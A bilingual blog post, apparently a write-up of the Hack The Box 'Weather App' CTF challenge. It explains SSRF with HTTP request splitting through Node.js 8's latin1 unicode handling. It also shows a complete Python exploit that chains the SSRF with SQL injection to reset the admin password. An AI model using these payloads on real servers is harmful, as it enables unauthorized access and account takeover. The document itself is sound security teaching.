<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">

















  <meta name="baidu-site-verification" content="wD6I1h8lGi">









<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">

<link rel="stylesheet" href="/css/main.css?v=7.1.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.2">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.2">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.2">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.2" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.1.2',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="本篇文章采用中文和英文两种语言编写，内容完全相同。如需查看中文版请下滑。 This article is written in Chinese and English, and the content is exactly the same. To view the Chinese version, please scroll down. SSRF Request Splitting Attack">
<meta property="og:type" content="article">
<meta property="og:title" content="SSRF Request Splitting attack&#x2F;SSRF之Request Splitting攻击">
<meta property="og:url" content="http://ama666.cn/2021/09/01/SSRF Request-Splittingattack/index.html">
<meta property="og:site_name" content="ama666">
<meta property="og:description" content="本篇文章采用中文和英文两种语言编写，内容完全相同。如需查看中文版请下滑。 This article is written in Chinese and English, and the content is exactly the same. To view the Chinese version, please scroll down. SSRF Request Splitting Attack">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210902005754.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210902011204.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210902005754.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210902011204.png">
<meta property="og:updated_time" content="2021-10-23T01:54:43.485Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SSRF Request Splitting attack&#x2F;SSRF之Request Splitting攻击">
<meta name="twitter:description" content="本篇文章采用中文和英文两种语言编写，内容完全相同。如需查看中文版请下滑。 This article is written in Chinese and English, and the content is exactly the same. To view the Chinese version, please scroll down. SSRF Request Splitting Attack">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210902005754.png">





  
  
  <link rel="canonical" href="http://ama666.cn/2021/09/01/SSRF Request-Splittingattack/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>SSRF Request Splitting attack/SSRF之Request Splitting攻击 | ama666</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ama666</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">平时多喝点茶</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>关于</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-sitemap">

    
    
    
      
    

    

    <a href="/sitemap.xml" rel="section"><i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>站点地图</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://ama666.cn/2021/09/01/SSRF Request-Splittingattack/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="安大侠">
      <meta itemprop="description" content="每天挣扎的活着">
      <meta itemprop="image" content="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20190616124508.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ama666">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SSRF Request Splitting attack/SSRF之Request Splitting攻击

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2021-09-02 00:41:14" itemprop="dateCreated datePublished" datetime="2021-09-02T00:41:14+08:00">2021-09-02</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2021-10-23 09:54:43" itemprop="dateModified" datetime="2021-10-23T09:54:43+08:00">2021-10-23</time>
              
            
          </span>

          

          
            
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>本篇文章采用中文和英文两种语言编写，内容完全相同。如需查看中文版请下滑。</p>
<p>This article is written in Chinese and English, and the content is exactly the same. To view the Chinese version, please scroll down.</p>
<h1 id="SSRF-Request-Splitting-Attack"><a href="#SSRF-Request-Splitting-Attack" class="headerlink" title="SSRF Request Splitting Attack"></a>SSRF Request Splitting Attack</h1><h2 id="Weather-APP"><a href="#Weather-APP" class="headerlink" title="Weather APP"></a>Weather APP</h2><p>This is a CTF question on <code>Hack The Box</code>, the source code can be downloaded for audit.</p>
<p><img src="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210902005754.png" alt></p>
<p>When auditing a set of source code based on experience, first look at routing, which contains three main functions, namely registration, login and weather query.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">router.post(<span class="string">'/register'</span>, (req, res) =&gt; &#123;</span><br><span class="line"><span class="keyword">if</span> (req.socket.remoteAddress.replace(<span class="regexp">/^.*:/</span>,<span class="string">''</span>) != <span class="string">'127.0.0.1'</span>) &#123;</span><br><span class="line"><span class="keyword">return</span> res.status(<span class="number">401</span>).end();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">let</span> &#123;username, password&#125; = req.body;</span><br><span class="line"><span class="keyword">if</span> (username &amp;&amp; password) &#123;</span><br><span class="line"><span class="keyword">return</span> db.register(username, password)</span><br><span class="line">.then(<span class="function"><span class="params">()</span> =&gt;</span> res.send(response(<span class="string">'Successfully registered'</span>)))</span><br><span class="line">.catch(<span class="function"><span class="params">()</span> =&gt;</span> res.send(response(<span class="string">'Something went wrong'</span>)));</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> res.send(response(<span class="string">'Missing parameters'</span>));</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">router.post(<span class="string">'/login'</span>, (req, res) =&gt; &#123;</span><br><span class="line"><span class="keyword">let</span> &#123;username, password&#125; = req.body;</span><br><span class="line"><span class="keyword">if</span> (username &amp;&amp; password) &#123;</span><br><span class="line"><span class="keyword">return</span> db.isAdmin(username, password)</span><br><span class="line">.then(<span class="function"><span class="params">admin</span> =&gt;</span> &#123;</span><br><span class="line"><span class="keyword">if</span> (admin) <span class="keyword">return</span> res.send(fs.readFileSync(<span class="string">'/app/flag'</span>).toString());</span><br><span class="line"><span class="keyword">return</span> res.send(response(<span class="string">'You are not admin'</span>));</span><br><span class="line">&#125;)</span><br><span class="line">.catch(<span class="function"><span class="params">()</span> =&gt;</span> res.send(response(<span class="string">'Something went wrong'</span>)));</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> re.send(response(<span class="string">'Missing parameters'</span>));</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">router.post(<span class="string">'/api/weather'</span>, (req, res) =&gt; &#123;</span><br><span class="line"><span class="keyword">let</span> &#123;endpoint, city, country&#125; = req.body;</span><br><span class="line"><span class="keyword">if</span> (endpoint &amp;&amp; city &amp;&amp; country) &#123;</span><br><span class="line"><span class="keyword">return</span> WeatherHelper.getWeather(res, endpoint, city, country);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> res.send(response(<span class="string">'Missing parameters'</span>));</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>There is not much content, please follow up one by one. First see that the registration function must be from the local to be able to register. Adding <code>X-Forwarded-For</code> to the request header does not fool the server.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (req.socket.remoteAddress.replace(<span class="regexp">/^.*:/</span>,<span class="string">''</span>) != <span class="string">'127.0.0.1'</span>) &#123;</span><br><span class="line"><span class="keyword">return</span> res.status(<span class="number">401</span>).end();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Then there is the login function. If you can log in as admin, the Flag will be displayed. The <code>isAdmin</code> function was called when verifying the admin identity, followed by the function to view the source code.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (username &amp;&amp; password) &#123;</span><br><span class="line"><span class="keyword">return</span> db.isAdmin(username, password)</span><br><span class="line">.then(<span class="function"><span class="params">admin</span> =&gt;</span> &#123;</span><br><span class="line"><span class="keyword">if</span> (admin) <span class="keyword">return</span> res.send(fs.readFileSync(<span class="string">'/app/flag'</span>).toString());</span><br><span class="line"><span class="keyword">return</span> res.send(response(<span class="string">'You are not admin'</span>));</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>The function uses SQL statements to obtain whether the user name is admin to determine the user’s identity, and parameterized queries cannot be used for SQL injection. Then since the database is used, the user name and password must be written into the database when registering. Follow up to the database file to have a look.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> isAdmin(user, pass) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">Promise</span>(<span class="keyword">async</span> (resolve, reject) =&gt; &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">let</span> smt = <span class="keyword">await</span> <span class="keyword">this</span>.db.prepare(<span class="string">'SELECT username FROM users WHERE username =? and password = ?'</span>);</span><br><span class="line">            <span class="keyword">let</span> row = <span class="keyword">await</span> smt.get(user, pass);</span><br><span class="line">            resolve(row !== <span class="literal">undefined</span>? row.username ==<span class="string">'admin'</span>: <span class="literal">false</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span>(e) &#123;</span><br><span class="line">            reject(e);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>The registration function in the database file does not use parameterized queries, so there is a SQL injection vulnerability. But the difficulty is that the registration function can only be initiated locally, so to exploit this vulnerability requires the cooperation of SSRF.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> register(user, pass) &#123;</span><br><span class="line">    <span class="comment">// <span class="doctag">TODO:</span> add parameterization and roll public</span></span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">Promise</span>(<span class="keyword">async</span> (resolve, reject) =&gt; &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">let</span> query = <span class="string">`INSERT INTO users (username, password) VALUES ('<span class="subst">$&#123;user&#125;</span>','<span class="subst">$&#123;pass&#125;</span>')`</span>;</span><br><span class="line">            resolve((<span class="keyword">await</span> <span class="keyword">this</span>.db.run(query)));</span><br><span class="line">        &#125; <span class="keyword">catch</span>(e) &#123;</span><br><span class="line">            reject(e);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>In the third function of routing, which is the weather query function, the <code>getWeather</code> function is called, in which an HTTP request is initiated, and the parameters are <code>endpoint</code>, etc. The source of these parameters is also controllable, so there is SSRF here Loopholes. But how to make another POST request to take advantage of the SQL injection vulnerability?</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> getWeather(res, endpoint, city, country) &#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// *.openweathermap.org is out of scope</span></span><br><span class="line">    <span class="keyword">let</span> apiKey = <span class="string">'10a62430af617a949055a46fa6dec32f'</span>;</span><br><span class="line">    <span class="keyword">let</span> weatherData = <span class="keyword">await</span> HttpHelper.HttpGet(<span class="string">`http://<span class="subst">$&#123;endpoint&#125;</span>/data/2.5/weather?q=<span class="subst">$&#123;city&#125;</span>,<span class="subst">$&#123;country&#125;</span>&amp;units=metric&amp;appid=<span class="subst">$&#123;apiKey&#125;</span>`</span>);</span><br></pre></td></tr></table></figure>

<h2 id="Request-Splitting"><a href="#Request-Splitting" class="headerlink" title="Request Splitting"></a>Request Splitting</h2><p>We all know that HTTP requests have a fixed format, and each line will be ended with <code>\r\n</code> to wrap.</p>
<p><img src="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210902011204.png" alt></p>
<p>Suppose there is a server that accepts the user’s get request and attaches parameters.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /acceptAPI?parameter=</span><br></pre></td></tr></table></figure>

<p> The user submits the following parameters</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">x HTTP/1.1\r\n\r\nDELETE /acceptAPI HTTP/1.1\r\n</span><br></pre></td></tr></table></figure>

<p>The request received by the server will change from one to two, and the first normal request will be inserted in the middle. The user inserted the <code>DELETE /acceptAPI HTTP/1.1</code> in the third line into a normal GET request, causing the server to receive two requests. This is the original form of the Request Splitting attack.</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/acceptAPI?parameter=x</span> HTTP/1.1</span><br><span class="line"></span><br><span class="line"><span class="keyword">DELETE</span> <span class="string">/acceptAPI</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host:*.*.*.*</span></span><br><span class="line"><span class="attribute">Content-Length:**</span></span><br><span class="line"><span class="attribute">Pragma</span>: *</span><br><span class="line">......</span><br></pre></td></tr></table></figure>

<p>In order to prevent the following situation, the HTTP library will add the percent sign to escape the control characters of the HTTP protocol like <code>\r\n</code> with a percent sign to escape <code>%0D%0A</code>, Javascript used in the above CTF question Will do the same thing. The malicious parameters submitted by the user will look like this</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">x HTTP/1.1%0D%0ADELETE /acceptAPI HTTP/1.1%0D%0A</span><br></pre></td></tr></table></figure>

<p>There are policies and countermeasures. Node.js 8 will use the <code>latin1</code> encoding for all HTTP requests, and the unicode character <code>\u010D\u010A</code> will become the HTTP request control character <code>\r\n</code> after encoding conversion. In this way, escaping can be bypassed and a Request Splitting attack can be performed.</p>
<h2 id="Back-to-Weather-APP"><a href="#Back-to-Weather-APP" class="headerlink" title="Back to Weather APP"></a>Back to Weather APP</h2><p>Following the book, using the coding vulnerability of Node.js 8, you can send a second POST request for SQL injection. Find the database file, which contains the structure of the data table. See that the attribute of the username field in the data table is <code>UNIQUE</code>, so the password of the admin user can only be changed to our known password instead of randomly generated unknown passwords by updating.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">async</span> migrate() &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">this</span>.db.exec(<span class="string">`</span></span><br><span class="line"><span class="string">        DROP TABLE IF EXISTS users;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        CREATE TABLE IF NOT EXISTS users (</span></span><br><span class="line"><span class="string">            id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,</span></span><br><span class="line"><span class="string">            username VARCHAR(255) NOT NULL UNIQUE,</span></span><br><span class="line"><span class="string">            password VARCHAR(255) NOT NULL</span></span><br><span class="line"><span class="string">        );</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        INSERT INTO users (username, password) VALUES ('admin','<span class="subst">$&#123; crypto.randomBytes(<span class="number">32</span>).toString(<span class="string">'hex'</span>) &#125;</span>');</span></span><br><span class="line"><span class="string">    `</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">') ON CONFLICT(username) <span class="keyword">DO</span> <span class="keyword">UPDATE</span> <span class="keyword">SET</span> <span class="keyword">password</span> =<span class="string">'admin'</span>;<span class="comment">--</span></span><br></pre></td></tr></table></figure>

<p>Next, we need to construct EXP and find the input point of the controllable parameter <code>endpoint</code> to construct. What we want to send, that is, the HTTP request for SQL injection attack is as follows</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/register</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 138.68.155.238:30819</span><br><span class="line"><span class="attribute">Content-Length</span>: *</span><br><span class="line"></span><br><span class="line">&#123;"endpoint":"') ON CONFLICT(username) DO UPDATE SET password ='admin';-- ","city":"Dallas","country":"US"&#125;</span><br></pre></td></tr></table></figure>

<p>According to the bypass method mentioned above, write the final EXP. Note that the single quotation marks, double quotation marks, and spaces also need to be encoded.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url =<span class="string">'http://138.68.155.238:30819'</span></span><br><span class="line">username = <span class="string">"admin"</span></span><br><span class="line">password = <span class="string">"1337') ON CONFLICT(username) DO UPDATE SET password ='admin';--"</span></span><br><span class="line"><span class="comment"># Encode spaces, single quotes, and double quotes</span></span><br><span class="line">parsedUsername = username.replace(<span class="string">" "</span>, <span class="string">"\u0120"</span>).replace(<span class="string">"'"</span>, <span class="string">"%27"</span>).replace(<span class="string">'"'</span>,<span class="string">"%22"</span>)</span><br><span class="line">parsedPassword = password.replace(<span class="string">" "</span>, <span class="string">"\u0120"</span>).replace(<span class="string">"'"</span>, <span class="string">"%27"</span>).replace(<span class="string">'"'</span>,<span class="string">"%22"</span>)</span><br><span class="line">contentLength = len(parsedUsername) + len(parsedPassword) + <span class="number">19</span></span><br><span class="line"></span><br><span class="line">endpoint = <span class="string">'127.0.0.1/\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\ u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u0120'</span>+ str(contentLength) +<span class="string">'\u010D\u010A\u010D\u010Ausername='</span> + parsedUsername +<span class="string">'&amp;password='</span> + parsedPassword+<span class="string">'\u010D\u010A\u010D\u010AGET\u0120/?lol='</span></span><br><span class="line"></span><br><span class="line">r = requests.post(url +<span class="string">'/api/weather'</span>, json=&#123;<span class="string">'endpoint'</span>: endpoint,<span class="string">'city'</span>:<span class="string">'Dallas'</span>,<span class="string">'country'</span>:<span class="string">'USA'</span>&#125;)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>

<h1 id="SSRF之Request-Splitting攻击"><a href="#SSRF之Request-Splitting攻击" class="headerlink" title="SSRF之Request Splitting攻击"></a>SSRF之Request Splitting攻击</h1><h2 id="Weather-APP-1"><a href="#Weather-APP-1" class="headerlink" title="Weather APP"></a>Weather APP</h2><p>这是一道<code>Hack The Box</code>上的CTF题，可以下载源代码进行审计。</p>
<p><img src="https://raw.githubusercontent.com/Annnnnnnnn/images/master/img/20210902005754.png" alt></p>
<p>根据经验审计一套源代码的时候首先看路由，其中包含三个主要功能，分别是注册、登陆和查询天气。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">router.post(<span class="string">'/register'</span>, (req, res) =&gt; &#123;</span><br><span class="line">	<span class="keyword">if</span> (req.socket.remoteAddress.replace(<span class="regexp">/^.*:/</span>, <span class="string">''</span>) != <span class="string">'127.0.0.1'</span>) &#123;</span><br><span class="line">		<span class="keyword">return</span> res.status(<span class="number">401</span>).end();</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">let</span> &#123; username, password &#125; = req.body;</span><br><span class="line">	<span class="keyword">if</span> (username &amp;&amp; password) &#123;</span><br><span class="line">		<span class="keyword">return</span> db.register(username, password)</span><br><span class="line">			.then(<span class="function"><span class="params">()</span>  =&gt;</span> res.send(response(<span class="string">'Successfully registered'</span>)))</span><br><span class="line">			.catch(<span class="function"><span class="params">()</span> =&gt;</span> res.send(response(<span class="string">'Something went wrong'</span>)));</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> res.send(response(<span class="string">'Missing parameters'</span>));</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">router.post(<span class="string">'/login'</span>, (req, res) =&gt; &#123;</span><br><span class="line">	<span class="keyword">let</span> &#123; username, password &#125; = req.body;</span><br><span class="line">	<span class="keyword">if</span> (username &amp;&amp; password) &#123;</span><br><span class="line">		<span class="keyword">return</span> db.isAdmin(username, password)</span><br><span class="line">			.then(<span class="function"><span class="params">admin</span> =&gt;</span> &#123;</span><br><span class="line">				<span class="keyword">if</span> (admin) <span class="keyword">return</span> res.send(fs.readFileSync(<span class="string">'/app/flag'</span>).toString());</span><br><span class="line">				<span class="keyword">return</span> res.send(response(<span class="string">'You are not admin'</span>));</span><br><span class="line">			&#125;)</span><br><span class="line">			.catch(<span class="function"><span class="params">()</span> =&gt;</span> res.send(response(<span class="string">'Something went wrong'</span>)));</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> re.send(response(<span class="string">'Missing parameters'</span>));</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">router.post(<span class="string">'/api/weather'</span>, (req, res) =&gt; &#123;</span><br><span class="line">	<span class="keyword">let</span> &#123; endpoint, city, country &#125; = req.body;</span><br><span class="line">	<span class="keyword">if</span> (endpoint &amp;&amp; city &amp;&amp; country) &#123;</span><br><span class="line">		<span class="keyword">return</span> WeatherHelper.getWeather(res, endpoint, city, country);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> res.send(response(<span class="string">'Missing parameters'</span>));</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>内容并不多，一个一个跟进去看看。首先看到注册功能必须是从本地才可以注册。在请求包头中添加<code>X-Forwarded-For</code>并不能骗过服务器。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (req.socket.remoteAddress.replace(<span class="regexp">/^.*:/</span>, <span class="string">''</span>) != <span class="string">'127.0.0.1'</span>) &#123;</span><br><span class="line">	<span class="keyword">return</span> res.status(<span class="number">401</span>).end();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后是登录功能，如果能够用admin的身份登陆，就会将Flag显示出来。验证admin身份的时候调用了<code>isAdmin</code>函数，跟进该函数进行查看源代码。</p>
